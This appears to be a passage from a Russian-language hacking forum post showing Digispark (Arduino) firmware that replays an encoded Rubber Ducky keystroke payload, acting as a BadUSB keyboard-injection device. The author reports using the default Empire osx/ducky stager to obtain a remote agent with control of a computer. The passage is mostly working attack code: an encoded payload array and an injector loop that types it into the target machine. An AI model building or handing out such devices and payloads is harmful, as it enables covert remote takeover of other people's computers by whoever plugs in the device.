0x13, 0x0, 0x13, 0x2, 0x16, 0x2, 0xb, 0x0, 0x13, 0x0, 0xe, 0x2, 0x1d, 0x0, 0x8, 0x2, 0x13, 0x0, 0xd, 0x2, 0x17, 0x2, 0xc, 0x2, 0x1e, 0x0, 0x11, 0x2, 0xa, 0x0, 0x12, 0x0, 0xa, 0x0, 0xc, 0x2, 0x6, 0x2, 0x4, 0x2, 0xa, 0x0, 0x4, 0x0, 0xd, 0x0, 0x27, 0x0, 0x12, 0x0, 0x4, 0x0, 0xc, 0x0, 0x17, 0x0, 0x17, 0x2, 0x1a, 0x2, 0x1f, 0x0, 0xf, 0x0, 0x7, 0x0, 0xe, 0x2, 0x16, 0x2, 0x18, 0x2, 0x1c, 0x0, 0x11, 0x2, 0x17, 0x2, 0x1c, 0x2, 0xe, 0x2, 0xc, 0x2, 0x6, 0x2, 0x4, 0x2, 0xa, 0x0, 0xc, 0x2, 0x9, 0x2, 0x11, 0x2, 0x5, 0x0, 0x4, 0x0, 0x19, 0x2, 0x27, 0x0, 0x16, 0x0, 0x18, 0x2, 0x1e, 0x0, 0x17, 0x0, 0x14, 0x0, 0x1b, 0x2, 0x17, 0x2, 0x1e, 0x0, 0x17, 0x2, 0x1a, 0x2, 0x1f, 0x0, 0x13, 0x0, 0x7, 0x0, 0xf, 0x2, 0x9, 0x2, 0x11, 0x2, 0x5, 0x0, 0x4, 0x0, 0x19, 0x2, 0x27, 0x0, 0xe, 0x2, 0xc, 0x2, 0x6, 0x2, 0x4, 0x2, 0xa, 0x0, 0xc, 0x2, 0xa, 0x2, 0x26, 0x0, 0x1e, 0x0, 0x7, 0x0, 0x6, 0x2, 0x22, 0x0, 0xb, 0x0, 0x6, 0x0, 0xb, 0x2, 0x5, 0x2, 0xf, 0x0, 0x5, 0x0, 0x10, 0x0, 0x14, 0x2, 0x12, 0x0, 0x1c, 0x2, 0x1f, 0x0, 0xb, 0x0, 0x1c, 0x0, 0xe, 0x2, 0xa, 0x2, 0x26, 0x0, 0x1c, 0x0, 0x1d, 0x2, 0x6, 0x2, 0xb, 0x0, 0xd, 0x0, 0x4, 0x0, 0xa, 0x2, 0x9, 0x2, 0x1c, 0x0, 0xe, 0x2, 0x19, 0x2, 0x22, 0x0, 0x17, 0x2, 0x1a, 0x2, 0x1c, 0x0, 0xb, 0x0, 0x17, 0x2, 0x1a, 0x2, 0x1f, 0x0, 0xf, 0x0, 0x7, 0x0, 0xe, 0x2, 0x1e, 0x0, 0x11, 0x2, 0x5, 0x0, 0x4, 0x0, 0xf, 0x0, 0x27, 0x0, 0x13, 0x0, 0xd, 0x2, 0x17, 0x2, 0xc, 0x2, 0x1e, 0x0, 0x11, 0x2, 0xf, 0x0, 0x27, 0x0, 0x13, 0x0, 0xe, 0x2, 0x14, 0x2, 0x13, 0x0, 0xf, 0x0, 0x8, 0x0, 0xa, 0x2, 0x19, 0x2, 0xd, 0x0, 0xe, 0x2, 0x6, 0x2, 0x6, 0x0, 0x11, 0x0, 0xf, 0x2, 0x10, 0x0, 0x13, 0x0, 0x19, 0x0, 0x4, 0x0, 0x1a, 0x2, 0x21, 0x0, 0x12, 0x0, 0x5, 0x0, 0x20, 0x0, 0x19, 0x2, 0x27, 0x0, 0xe, 0x2, 0x16, 0x2, 0xe, 0x0, 0x2e, 0x0, 0x34, 0x0, 0x27, 0x2, 0x27, 0x2, 0x33, 0x0, 0x34, 0x2, 0x2c, 0x0, 0x31, 0x2, 0x2c, 0x0, 0x13, 0x0, 0x1c, 0x0, 0x17, 0x0, 0xb, 0x0, 0x12, 0x0, 0x11, 0x0, 0x2c, 0x0, 0x24, 0x2, 0x28, 0x0, 0x0, 0xff, 0x0, 0xff, 0x0, 0xff, 0x0, 0xeb
};
int i = 1; //how many times the payload should run (-1 for endless loop)
bool blink=true;[/SIZE][/SIZE]
[SIZE=4][SIZE=4]void setup()
{
// initialize the digital pin as an output.
pinMode(0, OUTPUT); //LED on Model B
pinMode(1, OUTPUT); //LED on Model A
DigiKeyboard.delay(1000); //wait 1000 milliseconds before first run, to give target time to initialize
}[/SIZE][/SIZE]
[SIZE=4][SIZE=4]void loop()
{[/SIZE][/SIZE]
[SIZE=4][SIZE=4] //should code be runned in this loop?
if (i != 0) {
DigiKeyboard.sendKeyStroke(0);[/SIZE][/SIZE]
[SIZE=4][SIZE=4] //parse raw duckencoder script
for (int i=0; i<DUCK_LEN; i+=2)
{
uint8_t key = pgm_read_word_near(duckraw + i);
uint8_t mod = pgm_read_word_near(duckraw + i+1);
if (key == 0) //delay (a delay>255 is split into a sequence of delays)
{
DigiKeyboard.delay(mod);
}
else DigiKeyboard.sendKeyStroke(key,mod);
}
i--;
DigiKeyboard.delay(5000); //wait 5000 milliseconds before next loop iteration[/SIZE][/SIZE]
[SIZE=4][SIZE=4] }
// Тут должен был быть код, заставляющий мигать светодиоды по окончанию скрипта
}
Для полноценной работы стоит запариться над открытием терминала и английским вводом, но тут я использую дефолтный Empire-osx/ducky
Такой результат получаем на выходе:
Получен всеми желанный агент и доступ к компьютеру
Да-да, доступ к своему же компьютеру
И скажите теперь, что linux/osx - безопасные системы!
Последнее редактирование модератором: